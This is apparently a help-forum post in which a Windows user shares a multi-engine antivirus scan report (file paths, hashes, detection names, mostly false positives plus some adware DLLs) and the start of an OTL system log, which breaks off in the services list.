悪代官の伏魔殿掲示板

ＨＰログ３


File path: c:\program files\reference assemblies\microsoft\framework\v3.0\presentationframework.dll
Publisher: Microsoft Corporation
MD5: 4b737f8e182e591e296439a2bf7a7b1b
SHA-1: dd382910093f44d85b289f63422479cadf777efe
Created: 2014/11/13 20:26:21
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as W32/Sality.AT (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\utvideo\utv_cfg.exe
Publisher:
MD5: 62cb1798f5db762f0195a4a213646a07
SHA-1: c7fadc7f32ab6fefe229c146a247feb89f373001
Created: 2013/10/28 17:28:08
Detections: 2
Determination: Inconclusive
- nProtect as Trojan/W32.Agent.49152.ANL (Undefined)
- AhnLab V3 Security as Win-Trojan/Shutdowner.126976 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files\via\viaaud\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 2fadb479c5d257665052dc1422ae9ddf
SHA-1: 4293aaa0538bbb0b6c1160f98df98a6e9bfe8c30
Created: 2012/10/30 16:18:32
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\capcom\monster hunter frontier online\mhf.exe
Publisher:
MD5: 559575b576095ac53657a4ba77a943c4
SHA-1: aed4ef935eb54c7864f2ae225f0da908cbdebbf1
Created: 2014/08/21 4:39:32
Detections: 2
Determination: Ignore detections (false positive)
- Quick Heal as (Suspicious) - DNAScan
- ByteHero BDV as Virus.Win32.Heur.l

---------------------------------------------------------------------------------

File path: c:\program files (x86)\creative\プロダクト レジストレーション\japanese\inetreg.exe
Publisher: Creative Technology Ltd
Signer: Creative Technology Ltd
MD5: 71386e71d8ea3304b384097f9741ec0a
SHA-1: 478a50d94d78496222a098053a31e1f19efa4007
Created: 2012/10/31 18:21:39
Detections: 1
Determination: Ignore detections (false positive)
- nProtect as Trojan-Downloader/W32.Andromeda.755312 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\daemon tools lite\dthelper.exe
Publisher: Disc Soft Ltd
Signer: Disc Soft Ltd
MD5: 7bd824285ba0c820ef0eadb19528afd8
SHA-1: 0c14a9296bf1d497c6510055945680a757173e9d
Created: 2014/03/04 18:19:20
Detections: 1
Determination: Ignore detections (false positive)
- McAfee Web Gateway as Heuristic.BehavesLike.Win32.Suspicious-BAY.K

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ffmpeg.dll
Publisher:
MD5: 044a62845e948918c5f4e35c63b77b14
SHA-1: 9e4049ace89ce38639ccf009152c2a65a0b5df8a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoA (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_liba52.dll
Publisher:
MD5: b116fad39e0ccab620ab459ae591a507
SHA-1: 6e079200bc552be47043cb7bf485ceeb40b00457
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libdts.dll
Publisher:
MD5: 6111e47cc6a86055f793363bfd0e9219
SHA-1: 2f30e4172ae704299b76be6faf7d4de7c10b92fb
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\ff_libmad.dll
Publisher:
MD5: 55e7b5f21b7108e8371b6d1efde85eb2
SHA-1: d23a32e6836a0741ba1a2fa147d8ce281005b48a
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\libmpeg2_ff.dll
Publisher:
MD5: 30c891e093ec150ea74984386d320727
SHA-1: 74052846b3f9e71b353a80f565d5c9350df73c51
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\ffdshow\tomsmocomp_ff.dll
Publisher:
MD5: 140ca094c599b172caecf2bc4ea51d03
SHA-1: 2b769c8fe3637f872bf375f277b48a7ae278d948
Created: 2014/02/15 0:25:24
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\installshield installation information\{33f7a957-a66d-45a1-badf-6576083b14e2}\setup.exe
Publisher: InstallShield Software Corporation
MD5: a81fb6afcc0503ebd21915f128d1836d
SHA-1: f8b5759afa5cb055c8d5ffce2718722671da0c20
Created: 2013/10/28 16:33:36
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Trojan/KillAV.nhz (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\pingdns.dll
Publisher: Efficient Networks
Signer: Siemens Subscriber Networks LLC
MD5: 11b7b1c7806582e97cba88284fdaa782
SHA-1: 7cd908bf3c7d668a1248736fbdb987e5fe6a8311
Created: 2012/10/31 16:44:37
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious File With Mass Email Capabilities

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tangomanager.exe
Publisher: Efficient Networks Inc.
Signer: Siemens Subscriber Networks LLC
MD5: dda5c03f2ceebeff1eda761e746c41ac
SHA-1: 86b92e1b6f8b91611c200ff5ed8896921f44350f
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Prevx as Heuristic: Suspicious Hijacker (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\k-opticom\eo\app\tap.exe
Publisher:
Signer: Siemens Subscriber Networks LLC
MD5: 55f097d878319d374ca2dc778b4b08dd
SHA-1: b6228d09affa8b78564af5bd9cfb52129b813032
Created: 2012/10/31 16:44:38
Detections: 1
Determination: Ignore detections (false positive)
- Sunbelt AntiMalware as Trojan-Spy.Win32.Banker.E (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ebueula.dll
Publisher: Microsoft Corporation
MD5: d1cfcad7f3ad257beccbf248e043703a
SHA-1: d1a512c7a747949af1932ed5a5486128f0a10478
Created: 1999/09/03 3:41:58
Detections: 1
Determination: Ignore detections (false positive)
- NANO AntiVirus as Trojan.Win32.Obfuscate.crokuk (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\emod.dll
Publisher:
MD5: 70e8ed1125538b5d74bf5407c6206ea4
SHA-1: 20f78e3a79317c07ce278eb9083671c9c2f1b1ec
Created: 2012/12/17 16:26:21
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.JinofineN.Trojan (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\empires2.exe
Publisher: Microsoft Corporation
MD5: bc1a30f5a8a4828d80e9bced9c2a3caa
SHA-1: 0b4850ec610affe88c02b7a546e45b0b87067f2f
Created: 2000/07/29 6:33:14
Detections: 1
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.Malware.Generic.a.(kcloud) (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\ha312w32.dll
Publisher: MicroQuill Software Publishing, Inc.
MD5: ba83d7c4a9750d0edb7accaf17c49b09
SHA-1: decb10c809ccd9b47d135dd50384a4c094388695
Created: 1998/09/28 20:01:00
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as W32.HfsAutoB (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\uninstal.exe
Publisher: Microsoft Corporation
MD5: 9ee3ab2b115d5762c6c7c194f2e1f595
SHA-1: 65548c4f02ba4ed51e8e2ae5f2154edfdef96839
Created: 2000/09/28 4:17:58
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Virus.Win32.Part.a (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\wndmode.dll
Publisher:
MD5: 826ffb925e963318e72bfad04dc0835a
SHA-1: 445be1136297bf5ae1d0c03d43fb419e6a2bcf30
Created: 2012/12/17 16:26:20
Detections: 1
Determination: Ignore detections (false positive)
- ViRobot as Trojan.Win32.A.Downloader.276992.T (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\microsoft games\age of empires ii\data\closedpw.exe
Publisher:
MD5: 6295c1c28ab5bbba657d448308830dfd
SHA-1: c403e034343a1aebc1909c305177465c6dfbada0
Created: 1997/09/10 12:44:40
Detections: 2
Determination: Ignore detections (false positive)
- K7 Gateway Antivirus as Trojan (Undefined)
- ViRobot as Trojan.Win32.PSWIGames.49152.BM (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\navel\俺たちに翼はないｒ\uninst.exe
Publisher:
MD5: 1548d04ea38626a54c053612c42f6c00
SHA-1: 434fba20c40c1dba7b36d3f745a76dc79f0ac932
Created: 2014/11/20 14:38:04
Detections: 1
Determination: Ignore detections (false positive)
- Bkav FE as HW32.Pedka (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\niwango\nicoliveenc\xsplitgamesource.dll
Publisher: SplitmediaLabs Limited
MD5: a0c098e4c96c18a092a5b1df3ecac8e9
SHA-1: 95bc6ced5fc864bbc387e8089aca8a217de46f4c
Created: 2013/04/18 21:36:17
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_dinput.dll
Publisher: Project64
MD5: d5f798c360aaac128b0fc4a211688ccd
SHA-1: 4b55d92fda42f108bd0e22503afd905754e95caf
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\jabo_direct3d8.dll
Publisher: Project64
MD5: ff57f60c58ede6364b980edcb311873b
SHA-1: 5ec6e231f780d9eafa6ee855e0f4968a7f8c347d
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Agnitum Outpost as RiskWare.PEMalform (Adware)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\project64 2.1\plugin\1.6 plugins\nrage_dinput8_v2.dll
Publisher: Gbs
MD5: f5296ecc4d6ea5605291de9203032a82
SHA-1: 8e72558a56adb82f3ed939c39f67718a0068400e
Created: 2014/11/13 22:03:21
Detections: 1
Determination: Ignore detections (false positive)
- Antiy Labs AVL as Packed/Win32.Klone.gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\quicktime\qtsystem\quicktimeupdatehelper.exe
Publisher: Apple Inc.
MD5: 6ba0a1e9e362d1df46bf747ba0f942fa
SHA-1: e39ffa0bdd613caa6e84df3cb4dd5dae6f2a2b3d
Created: 2014/01/17 16:24:00
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Apple.V

---------------------------------------------------------------------------------

File path: c:\program files (x86)\segmentamplifier\segmentamplifier.dll
Publisher:
MD5: 1088823f5995b8bda197b6dfa0b40818
SHA-1: ed7c8a42748049f2c9932bd95cf502a6ce99eb6d
Created: 2015/02/25 17:41:13
Detections: 20
Determination: Adware
- Bkav FE as HW32.Packed (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Prot as W32/S-f055c78a (Undefined)
- Trend Micro House Call as TROJ_GEN.R08NH09BB15 (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.122341 (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.122341 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.122341 (Adware)
- F-Secure as Gen:Variant.Adware.Zusy.122341 (Adware)
- McAfee Web Gateway as BehavesLike.Win32.AdwareBDSearch.tc (Adware)
- Sophos as Generic PUA ON (Undefined)
- Avira AntiVirus as ADWARE/MultiPlug.Gen4 (Adware)
- G Data as Gen:Variant.Adware.Zusy.122341 (Adware)
- AhnLab V3 Security as PUP/Win32.MultiPlug (Adware)
- McAfee as Artemis!1088823F5995 (Undefined)
- Baidu Antivirus as PUA.Win32.SProtector (Adware)
- ESET NOD32 as Win32/SProtector.O potentially unwanted (variant) (Adware)
- IKARUS anti.virus as PUA.SProtector (Adware)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Virus.Adware.f45 (Adware)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\tk3\tk3.exe
Publisher: INTERHEART CO., LTD.
MD5: 9a895c4dd01bbeae4ff651c1516a8a55
SHA-1: 0c7be3beb5c00f66444d40cafe0cdd15e0ca9063
Created: 2011/03/08 1:00:00
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\hijackthis.exe
Publisher: Trend Micro Inc.
MD5: 29c81875332f7084321c3a82a9a7bf9f
SHA-1: 52c7a761d6c08f951f250ab6ee9bf67813e1112a
Created: 2010/03/25 18:42:36
Detections: 1
Determination: Ignore detections (false positive)
- Rising Antivirus as PE:Trojan.VBInject!1.6546 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-173048-813.dll
Publisher:
MD5: aafedd814bba50c1bf3f9a61799f63f4
SHA-1: c4bff3c9e6b4ef530c21a9e16f8954ac916b5e46
Created: 2015/03/06 9:10:08
Detections: 37
Determination: Adware
- Bkav FE as W32.GueteycosLTR.Trojan (Undefined)
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.230694 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.XPACK.doyjfa (Undefined)
- F-Prot as W32/S-6ad1b408 (Undefined)
- Trend Micro House Call as TROJ_GEN.R02KC0ECC15 (Undefined)
- avast! as Win32:PUP-gen [PUP] (Adware)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as PUA.MultiPlug (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.21906 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R02KC0ECC15 (Undefined)
- McAfee Web Gateway as Multiplug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- Jiangmin as Adware/Agent.aksh (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- McAfee as Multiplug-FNZ (Undefined)
- Vba32 AntiVirus as AdWare.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Rising Antivirus as PE:Adware.Zusy!6.1F0B (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-416.dll
Publisher:
MD5: 8fabf78be053de024e9c6bb1d87e5032
SHA-1: 3ac44421b2732f075f0c697414d16fca1d2fb575
Created: 2015/03/24 16:16:35
Detections: 29
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0OCS15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0OCS15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Sophos as MultiPlug (Undefined)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- Fortinet FortiGate as W32/MultiPlug.FL!tr (Undefined)
- AVG as Generic6 (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\trend micro\hijackthis\backups\backup-20150404-191940-520.dll
Publisher:
MD5: aafdcae081ecb1e24f261854fe44344b
SHA-1: aef1cb6da3c2dee6b6dd7b6ed001cddb78675183
Created: 2015/03/24 16:16:52
Detections: 35
Determination: Adware
- MicroWorld eScan as Gen:Variant.Adware.Zusy.121779 (Adware)
- McAfee as MultiPlug-FNZ (Undefined)
- Malwarebytes as PUP.Optional.Multiplug.A (Adware)
- Zillya! Antivirus as Adware.MultiPlug.Win32.241156 (Adware)
- SUPERAntiSpyware as Adware.MultiPlug/Variant (Adware)
- K7 Gateway Antivirus as Adware (Adware)
- K7 AntiVirus as Adware (Adware)
- NANO AntiVirus as Trojan.Win32.Crossrider1.dpmkgj (Adware)
- F-Prot as W32/S-df2a10d9 (Undefined)
- Trend Micro House Call as TROJ_GEN.R047C0ECU15 (Undefined)
- avast! as Win32:Adware-gen [Adw] (Adware)
- Kaspersky as HEUR:Trojan.Win32.Generic (Undefined)
- Bitdefender as Gen:Variant.Adware.Zusy.121779 (Adware)
- Agnitum Outpost as Trojan.Agent (Undefined)
- Lavasoft Ad-Aware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Sophos as MultiPlug (Undefined)
- Comodo Security as Application.Win32.AdWare.MultiPlug.VB (Adware)
- F-Secure as Gen:Variant.Adware.Zusy (Adware)
- Dr.Web as Trojan.Crossrider1.22889 (Adware)
- VIPRE Antivirus as Trojan.Win32.Generic (Undefined)
- Trend Micro as TROJ_GEN.R047C0ECU15 (Undefined)
- McAfee Web Gateway as MultiPlug-FNZ (Undefined)
- Emsisoft Anti-Malware as Gen:Variant.Adware.Zusy.121779 (Adware)
- Jiangmin as Adware/Agent.araf (Adware)
- Avira AntiVirus as TR/Crypt.XPACK.Gen7
- Antiy Labs AVL as Trojan/Win32.TSGeneric (Undefined)
- G Data as Gen:Variant.Adware.Zusy.121779 (Adware)
- AhnLab V3 Security as Adware/Win32.Agent (Adware)
- Baidu Antivirus as Adware.Win32.MultiPlug (Adware)
- ESET NOD32 as Win32/Adware.MultiPlug.FL (variant) (Adware)
- Fortinet FortiGate as Riskware/MultiPlug (Undefined)
- AVG as Generic6 (Undefined)
- Panda Antivirus as Trj/Genetic.gen (Undefined)
- Qihoo 360 Security as Win32/Trojan.cb1 (Undefined)
- Reason Heuristics as Threat.Win.Reputation.IMP (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\via\viaudioi\vdeck\viaaud.exe
Publisher: VIA
Signer: VIA Technologies Inc.
MD5: 87ebc6718a3c7a9a744570ac6cc7f459
SHA-1: 6c17b36324043f8c408ade822d1aaf079675c2ef
Created: 2012/10/30 16:18:35
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan.Malware.Win32.xPack.i (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\autoupdate-windows.exe
Publisher: Xvid Team
MD5: b9b5c142c75e7e2a95e7e958cf6eab3a
SHA-1: a88218ec8a6227754fb03acfabe7cca12a11c23a
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.XvidTeam.S

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\checkupdate.exe
Publisher:
MD5: 6d9e1356a9c1b5f36698faff9205e34a
SHA-1: 37433a3bf4ef209b1b159e5f379d26c46ebd6008
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- Boost by Reason as Optional.Startup.L

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\minicalc.exe
Publisher:
MD5: 7ce40a557359849ea374e0e4dde52e26
SHA-1: d865e7ef9c41d8c622ec87577685f3e1868f420e
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\ogmcalc.exe
Publisher:
MD5: 95caef9da6e9aee1ecd627527cfa0f38
SHA-1: f0ce07a0c7da2f0239ebfe3ca37cd03332d80f0b
Created: 2014/02/15 0:25:22
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\statsreader.exe
Publisher:
MD5: 487af46145b81c5bc54873e764f93636
SHA-1: f948b0544c59127e8845eef915f2ec3b6b1c3508
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\uninstall.exe
Publisher:
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA-1: da39a3ee5e6b4b0d3255bfef95601890afd80709
Created: 2014/02/15 0:25:27
Detections: 11
Determination: Ignore detections (false positive)
- Lavasoft Ad-Aware as Gen:Variant.Zusy.122341 (Undefined)
- ESET NOD32 as Win32/Bundlore.S potentially unwanted application (Adware)
- Avira AntiVirus as TR/ATRAPS.Gen (Undefined)
- Kaspersky as not-a-virus:RiskTool.Win32.SProtector (Adware)
- Dr.Web as Adware.Salus.7, Adware.Salus.5 (Adware)
- Microsoft Security Essentials as Worm:Win32/Yuner.A (Undefined)
- avast! as Malware-gen (Undefined)
- Clam AntiVirus as Win.Trojan.Agent-827002 (Undefined)
- F-Secure as Win32.Sality.OG (Undefined)
- F-Prot as W32/Podnuha.B.gen (Undefined)
- Reason Heuristics as Threat.Win.Reputation.thinkcellSoftwareGmbH (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\vidccleaner.exe
Publisher:
MD5: 6b5e418a9c02ab0c3f3dd50b0e3cd3a6
SHA-1: d7e976b79de0e822f41845f45c6311d11d2179d0
Created: 2014/02/15 0:25:23
Detections: 1
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\xvid\xvid_encraw.exe
Publisher:
MD5: 6ad766e0133c15132877fe64a50d3ebc
SHA-1: f7abafbf94fa1e64a023fda36edc119ca8e2b631
Created: 2014/02/15 0:25:20
Detections: 3
Determination: Inconclusive
- Trend Micro House Call as TROJ_GEN.F47V0715 (Undefined)
- Antiy Labs AVL as Trojan/Win32.Generic.gen (Undefined)
- Kingsoft AntiVirus as Win32.Troj.Undef.(kcloud) (Undefined)

以上です。

以下にＯＴＬのログを貼っていきます。

ＯＴＬログ１

OTL logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
